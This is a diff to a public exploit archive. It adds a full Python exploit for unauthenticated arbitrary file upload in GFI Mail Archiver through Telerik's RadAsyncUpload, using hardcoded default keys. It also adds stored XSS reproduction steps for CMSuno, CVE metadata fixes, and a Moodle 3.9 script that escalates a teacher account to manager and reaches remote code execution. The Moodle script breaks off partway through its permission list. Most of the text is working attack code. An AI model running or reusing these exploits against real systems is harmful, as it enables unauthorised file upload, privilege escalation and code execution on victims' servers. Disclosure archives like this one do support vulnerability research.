diff --git a/exploits/multiple/webapps/50181.py b/exploits/multiple/webapps/50181.py new file mode 100755 index 000000000..a14342a6b --- /dev/null +++ b/exploits/multiple/webapps/50181.py @@ -0,0 +1,350 @@ +# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated) +# Date: 21/03/2021 +# Exploit Author: Amin Bohio +# Original Research & Code By: Paul Taylor / Foregenix Ltd +# Original Exploit: https://github.com/bao7uo/RAU_crypto +# Vendor Homepage: https://www.gfi.com +# Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver +# Vulnerable Versions: GFI Mail Archiver <= 15.1 +# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload +# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference +# Tested on: Windows & Linux + +# Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver + +#!/usr/bin/python3 + +# Original Telerik Exploit Author: Paul Taylor / @bao7uo +# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py + +# Modified by: Amin Bohio + +import sys +import base64 +import json +import re +import requests +import os +from Crypto.Cipher import AES +from Crypto.Hash import HMAC +from Crypto.Hash import SHA256 +from Crypto.Hash import SHA1 +from struct import Struct +from operator import xor +from itertools import starmap + +import binascii + +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# ****************************************** +# ****************************************** + +# ADVANCED_SETTINGS section 1 of 2 +# Warning, the below prevents certificate warnings, +# and verify = False (CERT_VERIFY prevents them being verified + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +CERT_VERIFY = False + +# ****************************************** +# ****************************************** + +class PBKDF: + + def sha1(v): + hl = SHA1.new() + hl.update(v) + return hl.digest() + + def derive1(password, salt): + hash = (password + salt).encode() + for i in range(0, 99): + hash = PBKDF.sha1(hash) + + result = PBKDF.sha1(hash) + i = 1 + while len(result) < 48: + result += PBKDF.sha1(str(i).encode() + hash) + i += 1 + + return result + + def hmacsha1(v): + hl = PBKDF.mac.copy() + hl.update(v) + return bytearray(hl.digest()) + + + def derive2(password, salt): + # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py + result_length = 48 + PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new()) + result = [] + for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1): + rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b)) + for i in range(999): + u = PBKDF.hmacsha1(u) + rv = starmap(xor, zip(rv, u)) + result.extend(rv) + result = b''.join(map(bytes, [result]))[:result_length] + return result + + def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])): + if type == 1: + result = PBKDF.derive1(password, salt) + result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack + elif type == 2: + result = PBKDF.derive2(password, salt) + + return result[0:32], result[32:] + + +class RAUCipher: + + +# ****************************************** +# ****************************************** + + # ADVANCED_SETTINGS section 2 of 2 + + # Default settings are for vulnerable versions before 2017 patches with default keys + + T_Upload_ConfigurationHashKey = \ + "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches + HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey + + T_AsyncUpload_ConfigurationEncryptionKey = \ + "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches + PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password + + # Latest tested version working with this setting: 2018.1.117 + # Probably working up to and including 2018.3.910 + PBKDF_ALGORITHM = 1 + + # Earliest tested version working with this setting: 2019.2.514 + # Probably introduced 2019.1.115 +# PBKDF_ALGORITHM = 2 + +# ****************************************** +# ****************************************** + + key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD) + +# print(binascii.hexlify(key).decode().upper()) +# print(binascii.hexlify(iv).decode().upper()) + + def encrypt(plaintext): + sys.stderr.write("Encrypting... ") + encoded = "" + for i in plaintext: + encoded = encoded + i + "\x00" + plaintext = encoded + ( + chr(16 - (len(encoded) % 16)) * + (16 - (len(encoded) % 16)) + ) + cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) + sys.stderr.write("done\n") + return base64.b64encode(cipher.encrypt(plaintext.encode())).decode() + + + def decrypt(ciphertext): + sys.stderr.write("Decrypting... ") + ciphertext = base64.b64decode(ciphertext) + cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) + unpad = lambda s: s[0:-ord(chr(s[-1]))] + sys.stderr.write("done\n") + return unpad(cipher.decrypt(ciphertext)).decode()[0::2] + + + def addHmac(string, Version): + + isHmacVersion = False + + # "Encrypt-then-MAC" feature introduced in R1 2017 + # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.) + + if int(Version[:4]) >= 2017: + isHmacVersion = True + + hmac = HMAC.new( + bytes(RAUCipher.HASHKEY.encode()), + string.encode(), + SHA256.new() + ) + + hmac = base64.b64encode(hmac.digest()).decode() + return string + hmac if isHmacVersion else string + + +def getProxy(proxy): + return { "http" : proxy, "https" : proxy } + + +def rauPostData_enc(partA, partB): + data = "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n" + data += "\r\n" + data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n" + return data + + +def rauPostData_prep(TempTargetFolder, Version): + TargetFolder = RAUCipher.addHmac( + RAUCipher.encrypt(""), + Version + ) + TempTargetFolder = RAUCipher.addHmac( + RAUCipher.encrypt(TempTargetFolder), + Version + ) + + partA = \ + '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \ + TempTargetFolder + \ + '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}' + + partB = \ + "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \ + Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4" + + return rauPostData_enc(partA, partB) + + +def payload(TempTargetFolder, Version, payload_filename): + sys.stderr.write("Local file path: " + payload_filename + "\n") + payload_filebasename = os.path.basename(payload_filename) + sys.stderr.write("Destination file name: " + payload_filebasename + "\n") + sys.stderr.write("Destination path: " + TempTargetFolder + "\n") + sys.stderr.write("Version: " + Version + "\n") + sys.stderr.write("Preparing payload... \n") + payload_file = open(payload_filename, "rb") + payload_file_data = payload_file.read() + payload_file.close() + + data = rauPostData_prep(TempTargetFolder, Version) + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload_file_data.decode("raw_unicode_escape") + "\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"fileName\"\r\n" + data += "\r\n" + data += "RAU_crypto.bypass\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"contentType\"\r\n" + data += "\r\n" + data += "text/html\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n" + data += "\r\n" + data += "2019-01-02T03:04:05.067Z\r\n" + data += "-----------------------------62616f37756f2f\r\n" + data += "Content-Disposition: form-data; name=\"metadata\"\r\n" + data += "\r\n" + data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \ + payload_filebasename + "\"}\r\n" + data += "-----------------------------62616f37756f2f--\r\n" + data += "\r\n" + sys.stderr.write("Payload prep done\n") + return data + + +def upload(data, url, proxy = False): + + global CERT_VERIFY + + sys.stderr.write("Preparing to send request to " + url + "\n") + session = requests.Session() + request = requests.Request( + "POST", + url, + data=data + ) + request = request.prepare() + request.headers["Content-Type"] = \ + "multipart/form-data; " +\ + "boundary=---------------------------62616f37756f2f" + response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy)) + sys.stderr.write("Request done\n") + return response.text + + +def decode_rauPostData(rauPostData): + rauPostData = rauPostData.split("&") + rauJSON = RAUCipher.decrypt(rauPostData[0]) + decoded = "\nJSON: " + rauJSON + "\n" + TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"] + decoded = decoded + "\nTempTargetFolder = " + \ + RAUCipher.decrypt(TempTargetFolder) + "\n" + rauVersion = RAUCipher.decrypt(rauPostData[1]) + decoded = decoded + "\nVersion: " + rauVersion + "\n" + return decoded + + +def mode_decrypt(): + # decrypt ciphertext + ciphertext = sys.argv[2] + print("\n" + RAUCipher.decrypt(ciphertext) + "\n") + + +def mode_Decrypt_rauPostData(): + # decrypt rauPostData + rauPostData = sys.argv[2] + print(decode_rauPostData(rauPostData)) + + +def mode_encrypt(): + # encrypt plaintext + plaintext = sys.argv[2] + print("\n" + RAUCipher.encrypt(plaintext) + "\n") + + +def mode_Encrypt_rauPostData(): + # encrypt rauPostData based on TempTargetFolder and Version + TempTargetFolder = sys.argv[2] + Version = sys.argv[3] + print( + "rauPostData: " + + rauPostData_prep(TempTargetFolder, Version) + + "\n" + ) + + +def mode_payload(): + # generate a payload based on TempTargetFolder, Version and payload file + TempTargetFolder = sys.argv[2] + Version = "2013.1.417.40" + payload_filename = sys.argv[4] + print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f") + print(payload(TempTargetFolder, Version, payload_filename)) + + +def mode_Post(proxy = False): + # generate and upload a payload based on + # TempTargetFolder, Version, payload file and url + Version = "2013.1.417.40" + url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau" + payload_filename = sys.argv[4] + TempTargetFolder = sys.argv[6] + + print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy)) + print("\n[+] Check your uploaded file\n"); + + +def mode_help(): + print( + "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'") + + +sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n") +sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n") + +if len(sys.argv) < 2: + mode_help() +elif sys.argv[1] == "-u" and len(sys.argv) == 7: + mode_Post() +else: + mode_help() \ No newline at end of file diff --git a/exploits/php/webapps/49352.txt b/exploits/php/webapps/49352.txt index daa3dd95f..77392a270 100644 --- a/exploits/php/webapps/49352.txt +++ b/exploits/php/webapps/49352.txt @@ -8,7 +8,7 @@ # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application -# CVE: CVE-2021-25791 +# CVE: CVE-2021-25790 Step 1: Create a new user then login Step 2: Click on "Register" page to register a room. diff --git a/exploits/php/webapps/49396.txt b/exploits/php/webapps/49396.txt index d54e9824a..cc6269efb 100644 --- a/exploits/php/webapps/49396.txt +++ b/exploits/php/webapps/49396.txt @@ -1,10 +1,11 @@ -# Exploit Title: Online Doctor Appointment System 1.0 - Multiple Stored XSS +# Exploit Title: Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS # Tested on: Windows 10 # Exploit Author: Mohamed habib Smidi (Craniums) # Date: 2021-01-08 # Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code # Affected Version: Version 1 +# CVE : CVE-2021-25791 Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php Step 2: then Click on the username and go to profile diff --git a/exploits/php/webapps/50179.txt b/exploits/php/webapps/50179.txt new file mode 100644 index 000000000..c10ce9ef9 --- /dev/null +++ b/exploits/php/webapps/50179.txt @@ -0,0 +1,23 @@ +# Exploit Title: CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 03-08-2021 +# Exploit Author: splint3rsec +# Vendor Homepage: https://github.com/boiteasite +# Software Link: https://github.com/boiteasite/cmsuno +# Affected Version(s): CMSuno 1.7 (and prior) +# CVE : CVE-2021-36654 + +CMSuno version 1.7 and prior is vulnerable to a stored cross-site scripting. + +The attacker must be authenticated to exploit the vulnerability. + +The payload injection is done while updating the template's image filename, vulnerable parameter is *tgo* + +Steps to reproduce: + +1. Go to /uno.php and click on *plugins* +2. Click on *Logo* +3. Choose a random picture in your files repo, click on save and intercept the request +4. Edit the POST request to /uno/template/uno1/uno1.php by modifying the tgo parameter's value to ")} +5. Forward the request and click on *publish* +6. Click on *See the website* +7. XSS \ No newline at end of file diff --git a/exploits/php/webapps/50180.py b/exploits/php/webapps/50180.py new file mode 100755 index 000000000..2e61cdc96 --- /dev/null +++ b/exploits/php/webapps/50180.py @@ -0,0 +1,349 @@ +# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) +# Date: 12-05-2021 +# Exploit Author: lanz +# Vendor Homepage: https://moodle.org/ +# Version: Moodle 3.9 +# Tested on: FreeBSD + +#!/usr/bin/python3 + +## Moodle 3.9 - RCE (Authenticated as teacher) +## Based on PoC and Payload to assign full permissions to manager rol: +## * https://github.com/HoangKien1020/CVE-2020-14321 + +## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py + +import string, random +import requests, re +import argparse +import base64 +import signal +import time +from pwn import * + +class Color: + BLUE = '\033[94m' + GREEN = '\033[92m' + YELLOW = '\033[93m' + RED = '\033[91m' + END = '\033[0m' + +def def_handler(sig, frame): + print(Color.RED + "\n[!] 3xIt1ngG...\n") + exit(1) + +signal.signal(signal.SIGINT, def_handler) + +banner = base64.b64decode("IF9fICAgICBfXyAgICAgX18gICBfXyAgX18gICBfXyAgICAgICAgICAgICAgX18gIF9fICAgICAKLyAgXCAgL3xfICBfXyAgIF8pIC8gIFwgIF8pIC8gIFwgX18gIC98IHxfX3wgIF8pICBfKSAvfCAKXF9fIFwvIHxfXyAgICAgL19fIFxfXy8gL19fIFxfXy8gICAgICB8ICAgIHwgX18pIC9fXyAgfCDigKIgYnkgbGFuegoKTW9vZGxlIDMuOSAtIFJlbW90ZSBDb21tYW5kIEV4ZWN1dGlvbiAoQXV0aGVudGljYXRlZCBhcyB0ZWFjaGVyKQpDb3Vyc2UgZW5yb2xtZW50cyBhbGxvd2VkIHByaXZpbGVnZSBlc2NhbGF0aW9uIGZyb20gdGVhY2hlciByb2xlIGludG8gbWFuYWdlciByb2xlIHRvIFJDRQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==").decode() + +print(Color.BLUE + banner + Color.END) + +def usagemybro(): + fNombre = os.path.basename(__file__) + ussage = fNombre + ' [-h] [-u USERNAME] [-p PASSWORD] [-idm ID_MANAGER] [-idc ID_COURSE] [-c COMMAND] [--cookie TEACHER_COOKIE] url\n\n' + ussage += '[+] Examples:\n' + ussage += '\t' + fNombre + ' http://moodle.site.com/moodle -u teacher_name -p teacher_pass\n' + ussage += '\t' + fNombre + " http://moodle.site.com/moodle --cookie thisistheffcookieofmyteaaacher\n" + return ussage + +def arguments(): + parse = argparse.ArgumentParser(usage=usagemybro()) + parse.add_argument(dest='url', type=str, help='URL Moodle site') + parse.add_argument('-u', dest='username', type=str, default='lanz', help='Teacher username, default: lanz') + parse.add_argument('-p', dest='password', type=str, default='Lanz123$!', help='Teacher password, default: Lanz123$!') + parse.add_argument('-idm', dest='id_manager', type=str, default='25', help='Manager user ID, default: 25') + parse.add_argument('-idc', dest='id_course', type=str, default='5', help='Course ID valid to enrol yourself, default: 5') + parse.add_argument('-c', dest='command', type=str, default='whoami', help='Command to execute, default: whoami') + parse.add_argument('--cookie', dest='teacher_cookie', type=str, default='', help='Teacher cookie (if you don\'t have valid credentials)') + return parse.parse_args() + +def login(url, username, password, course_id, teacher_cookie): + ''' + Sign in on site, with creds or with cookie + ''' + + p1 = log.progress("Login on site") + + session = requests.Session() + r = session.get(url + '/login/index.php') + + # Sign in with teacher cookie + if teacher_cookie != "": + p1.status("Cookie " + Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END) + time.sleep(2) + + # In case the URL format is: http://moodle.site.com/moodle + cookie_domain = url.split('/')[2] # moodle.site.com + cookie_path = "/%s/" % (url.split('/')[3]) # /moodle/ + session.cookies.set('MoodleSession', teacher_cookie, domain=cookie_domain, path=cookie_path) + + r = session.get(url + '/user/index.php', params={"id":course_id}) + try: + re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] + except IndexError: + p1.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") + exit(1) + + id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + p1.success(Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END + Color.YELLOW + " ✓" + Color.END) + time.sleep(1) + + # Sign in with teacher credentials + elif username and password != "": + p1.status("Creds " + Color.BLUE + username + ":" + password + Color.END) + time.sleep(2) + + login_token = re.findall(r'name="logintoken" value="(.*?)"', r.text)[0] + + data_post = { + "anchor" : "", + "logintoken" : login_token, + "username" : username, + "password" : password + } + + r = session.post(url + '/login/index.php', data=data_post) + if "Recently accessed courses" not in r.text: + p1.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nInvalid credentials.\n") + exit(1) + + id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + p1.success(Color.BLUE + username + ":" + password + Color.END + Color.YELLOW + " ✓" + Color.END) + time.sleep(1) + + else: + print(Color.RED + "\nUse valid credentials or valid cookie\n") + exit(1) + + return session, id_user, sess_key + +def enrol2rce(session, url, id_manager, username, course_id, teacher_cookie, command): + ''' + Assign rol manager to teacher and manager account in the course. + ''' + + p4 = log.progress("Updating roles to move on manager accout") + time.sleep(1) + + r = session.get(url + '/user/index.php', params={"id":course_id}) + try: + teacher_user = re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] + except IndexError: + p4.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") + exit(1) + + p4.status("Teacher " + Color.BLUE + teacher_user + Color.END) + time.sleep(1) + + id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + session = update_rol(session, url, sess_key, course_id, id_user) + session = update_rol(session, url, sess_key, course_id, id_manager) + + data_get = { + "id" : course_id, + "user" : id_manager, + "sesskey" : sess_key + } + + r = session.get(url + '/course/loginas.php', params=data_get) + if "You are logged in as" not in r.text: + p4.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nError trying to move on manager account. Validate credentials (or cookie).\n") + exit(1) + + p4.success(Color.YELLOW + "✓" + Color.END) + time.sleep(1) + + sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] + + # Updating rol manager to enable install plugins + session, sess_key = update_rol_manager(session, url, sess_key) + + # Upload malicious zip file + zipb64_up(session, url, sess_key, teacher_user, course_id) + + # RCE on system + moodle_RCE(url, command) + +def update_rol(session, url, sess_key, course_id, id_user): + ''' + Updating teacher rol to enable he update other users + ''' + + data_get = { + "mform_showmore_main" : "0", + "id" : course_id, + "action" : "enrol", + "enrolid" : "10", + "sesskey" : sess_key, + "_qf__enrol_manual_enrol_users_form" : "1", + "mform_showmore_id_main" : "0", + "userlist[]" : id_user, + "roletoassign" : "1", + "startdate" : "4", + "duration" : "" + } + + r = session.get(url + '/enrol/manual/ajax.php', params=data_get) + return session + +def update_rol_manager(session, url, sess_key): + ''' + Updating rol manager to enable install plugins + * Extracted from: https://github.com/HoangKien1020/CVE-2020-14321 + ''' + + p6 = log.progress("Updating rol manager to enable install plugins") + time.sleep(1) + + data_get = { + "action":"edit", + "roleid":"1" + } + + random_desc = ''.join(random.choice(string.ascii_lowercase) for i in range(15)) + + # Headache part :P + data_post = [('sesskey',sess_key),('return','manage'),('resettype','none'),('shortname','manager'),('name',''),('description',random_desc),('archetype','manager'),('contextlevel10','0'),('contextlevel10','1'),('contextlevel30','0'),('contextlevel30','1'),('contextlevel40','0'),('contextlevel40','1'),('contextlevel50','0'),('contextlevel50','1'),('contextlevel70','0'),('contextlevel70','1'),('contextlevel80','0'),('contextlevel80','1'),('allowassign[]',''),('allowassign[]','1'),('allowassign[]','2'),('allowassign[]','3'),('allowassign[]','4'),('allowassign[]','5'),('allowassign[]','6'),('allowassign[]','7'),('allowassign[]','8'),('allowoverride[]',''),('allowoverride[]','1'),('allowoverride[]','2'),('allowoverride[]','3'),('allowoverride[]','4'),('allowoverride[]','5'),('allowoverride[]','6'),('allowoverride[]','7'),('allowoverride[]','8'),('allowswitch[]',''),('allowswitch[]','1'),('allowswitch[]','2'),('allowswitch[]','3'),('allowswitch[]','4'),('allowswitch[]','5'),('allowswitch[]','6'),('allowswitch[]','7'),('allowswitch[]','8'),('allowview[]',''),('allowview[]','1'),('allowview[]','2'),('allowview[]','3'),('allowview[]','4'),('allowview[]','5'),('allowview[]','6'),('allowview[]','7'),('allowview[]','8'),('block/admin_bookmarks:myaddinstance','1'),('block/badges:myaddinstance','1'),('block/calendar_month:myaddinstance','1'),('block/calendar_upcoming:myaddinstance','1'),('block/comments:myaddinstance','1'),('block/course_list:myaddinstance','1'),('block/globalsearch:myaddinstance','1'),('block/glossary_random:myaddinstance','1'),('block/html:myaddinstance','1'),('block/lp:addinstance','1'),('block/lp:myaddinstance','1'),('block/mentees:myaddinstance','1'),('block/mnet_hosts:myaddinstance','1'),('block/myoverview:myaddinstance','1'),('block/myprofile:myaddinstance','1'),('block/navigation:myaddinstance','1'),('block/news_items:myaddinstance','1'),('block/online_users:myaddinstance','1'),('block/private_files:myaddinstance','1'),('block/recentlyaccessedcourses:myaddinstance','1'),('block/recentlyaccesseditems:myaddinstance','1'),('block/rss_client:myaddinstance','1'),('block/settings:myaddinstance','1'),('block/starredcourses:myaddinstance','1'),('block/tags:myaddinstance','1'),('block/timeline:myaddinstance','1'),('enrol/category:synchronised','1'),('message/airnotifier:managedevice','1'),('moodle/analytics:listowninsights','1'),('moodle/analytics:managemodels','1'),('moodle/badges:manageglobalsettings','1'),('moodle/blog:create','1'),('moodle/blog:manageentries','1'),('moodle/blog:manageexternal','1'),('moodle/blog:search','1'),('moodle/blog:view','1'),('moodle/blog:viewdrafts','1'),('moodle/course:configurecustomfields','1'),('moodle/course:recommendactivity','1'),('moodle/grade:managesharedforms','1'),('moodle/grade:sharegradingforms','1'),('moodle/my:configsyspages','1'),('moodle/my:manageblocks','1'),('moodle/portfolio:export','1'),('moodle/question:config','1'),('moodle/restore:createuser','1'),('moodle/role:manage','1'),('moodle/search:query','1'),('moodle/site:config','1'),('moodle/site:configview','1'),('moodle/site:deleteanymessage','1'),('moodle/site:deleteownmessage','1'),('moodle/site:doclinks','1'),('moodle/site:forcelanguage','1'),('moodle/site:maintenanceaccess','1'),('moodle/site:manageallmessaging','1'),('moodle/site:messageanyuser','1'),('moodle/site:mnetlogintoremote','1'),('moodle/site:readallmessages','1'),('moodle/site:sendmessage','1'),('moodle/site:uploadusers','1'),('moodle/site:viewparticipants','1'),('moodle/tag:edit','1'),('moodle/tag:editblocks','1'),('moodle/tag:flag','1'),('moodle/tag:manage','1'),('moodle/user:changeownpassword','1'),('moodle/user:create','1'),('moodle/user:delete','1'),('moodle/user:editownmessageprofile','1'),('moodle/user:editownprofile','1'),('moodle/user:ignoreuserquota','1'),('moodle/user:manageownblocks','1'),('moodle/user:manageownfiles','1'),('moodle/user:managesyspages','1'),('moodle/user:update','1'),('moodle/webservice:createmobiletoken','1'),('moodle/webservice:createtoken','1'),('moodle/webservice:managealltokens','1'),('quizaccess/seb:managetemplates','1'),('report/courseoverview:view','1'),('report/performance:view','1'),('report/questioninstances:view','1'),('report/security:view','1'),('report/status:view','1'),('tool/customlang:edit','1'),('tool/customlang:view','1'),('tool/dataprivacy:managedataregistry','1'),('tool/dataprivacy:managedatarequests','1'),('tool/dataprivacy:requestdeleteforotheruser','1'),('tool/lpmigrate:frameworksmigrate','1'),('tool/monitor:managetool','1'),('tool/policy:accept','1'),('tool/policy:managedocs','1'),('tool/policy:viewacceptances','1'),('tool/uploaduser:uploaduserpictures','1'),('tool/usertours:managetours','1'),('auth/oauth2:managelinkedlogins','1'),('moodle/badges:manageownbadges','1'),('moodle/badges:viewotherbadges','1'),('moodle/competency:evidencedelete','1'),('moodle/competency:plancomment','1'),('moodle/competency:plancommentown','1'),('moodle/competency:planmanage','1'),('moodle/competency:planmanagedraft','1'),('moodle/competency:planmanageown','1'),('moodle/competency:planmanageowndraft','1'),('moodle/competency:planrequestreview','1'),('moodle/competency:planrequestreviewown','1'),('moodle/competency:planreview','1'),('moodle/competency:planview','1'),('moodle/competency:planviewdraft','1'),('moodle/competency:planviewown','1'),('moodle/competency:planviewowndraft','1'),('moodle/competency:usercompetencycomment','1'),('moodle/competency:usercompetencycommentown','1'),('moodle/competency:usercompetencyrequestreview','1'),('moodle/competency:usercompetencyrequestreviewown','1'),('moodle/competency:usercompetencyreview','1'),('moodle/competency:usercompetencyview','1'),('moodle/competency:userevidencemanage','1'),('moodle/competency:userevidencemanageown','0'),('moodle/competency:userevidenceview','1'),('moodle/user:editmessageprofile','1'),('moodle/user:editprofile','1'),('moodle/user:manageblocks','1'),('moodle/user:readuserblogs','1'),('moodle/user:readuserposts','1'),('moodle/user:viewalldetails','1'),('moodle/user:viewlastip','1'),('moodle/user:viewuseractivitiesreport','1'),('report/usersessions:manageownsessions','1'),('tool/dataprivacy:downloadallrequests','1'),('tool/dataprivacy:downloadownrequest','1'),('tool/dataprivacy:makedatadeletionrequestsforchildren','1'),('tool/dataprivacy:makedatarequestsforchildren','1'),('tool/dataprivacy:requestdelete','1'),('tool/policy:acceptbehalf','1'),('moodle/category:manage','1'),('moodle/category:viewcourselist','1'),('moodle/category:viewhiddencategories','1'),('moodle/cohort:assign','1'),('moodle/cohort:manage','1'),('moodle/competency:competencymanage','1'),('moodle/competency:competencyview','1'),('moodle/competency:templatemanage','1'),('moodle/competency:templateview','1'),('moodle/course:create','1'),('moodle/course:request','1'),('moodle/site:approvecourse','1'),('repository/contentbank:accesscoursecategorycontent','1'),('repository/contentbank:accessgeneralcontent','1'),('block/recent_activity:viewaddupdatemodule','1'),('block/recent_activity:viewdeletemodule','1'),('contenttype/h5p:access','1'),('contenttype/h5p:upload','1'),('contenttype/h5p:useeditor','1'),('enrol/category:config','1'),('enrol/cohort:config','1'),('enrol/cohort:unenrol','1'),('enrol/database:config','1'),('enrol/database:unenrol','1'),('enrol/flatfile:manage','1'),('enrol/flatfile:unenrol','1'),('enrol/guest:config','1'),('enrol/imsenterprise:config','1'),('enrol/ldap:manage','1'),('enrol/lti:config','1'),('enrol/lti:unenrol','1'),('enrol/manual:config','1'),('enrol/manual:enrol','1'),('enrol/manual:manage','1'),('enrol/manual:unenrol','1'),('enrol/manual:unenrolself','1'),('enrol/meta:config','1'),('enrol/meta:selectaslinked','1'),('enrol/meta:unenrol','1'),('enrol/mnet:config','1'),('enrol/paypal:config','1'),('enrol/paypal:manage','1'),('enrol/paypal:unenrol','1'),('enrol/paypal:unenrolself','1'),('enrol/self:config','1'),('enrol/self:holdkey','1'),('enrol/self:manage','1'),('enrol/self:unenrol','1'),('enrol/self:unenrolself','1'),('gradeexport/ods:publish','1'),('gradeexport/ods:view','1'),('gradeexport/txt:publish','1'),('gradeexport/txt:view','1'),('gradeexport/xls:publish','1'),('gradeexport/xls:view','1'),('gradeexport/xml:publish','1'),('gradeexport/xml:view','1'),('gradeimport/csv:view','1'),('gradeimport/direct:view','1'),('gradeimport/xml:publish','1'),('gradeimport/xml:view','1'),('gradereport/grader:view','1'),('gradereport/history:view','1'),('gradereport/outcomes:view','1'),('gradereport/overview:view','1'),('gradereport/singleview:view','1'),('gradereport/user:view','1'),('mod/assign:addinstance','1'),('mod/assignment:addinstance','1'),('mod/book:addinstance','1'),('mod/chat:addinstance','1'),('mod/choice:addinstance','1'),('mod/data:addinstance','1'),('mod/feedback:addinstance','1'),('mod/folder:addinstance','1'),('mod/forum:addinstance','1'),('mod/glossary:addinstance','1'),('mod/h5pactivity:addinstance','1'),('mod/imscp:addinstance','1'),('mod/label:addinstance','1'),('mod/lesson:addinstance','1'),('mod/lti:addcoursetool','1'),('mod/lti:addinstance','1'),('mod/lti:addmanualinstance','1'),('mod/lti:addpreconfiguredinstance','1'),('mod/lti:requesttooladd','1'),('mod/page:addinstance','1'),('mod/quiz:addinstance','1'),('mod/resource:addinstance','1'),('mod/scorm:addinstance','1'),('mod/survey:addinstance','1'),('mod/url:addinstance','1'),('mod/wiki:addinstance','1'),('mod/workshop:addinstance','1'),('moodle/analytics:listinsights','1'),('moodle/backup:anonymise','1'),('moodle/backup:backupcourse','1'),('moodle/backup:backupsection','1'),('moodle/backup:backuptargetimport','1'),('moodle/backup:configure','1'),('moodle/backup:downloadfile','1'),('moodle/backup:userinfo','1'),('moodle/badges:awardbadge','1'),('moodle/badges:configurecriteria','1'),('moodle/badges: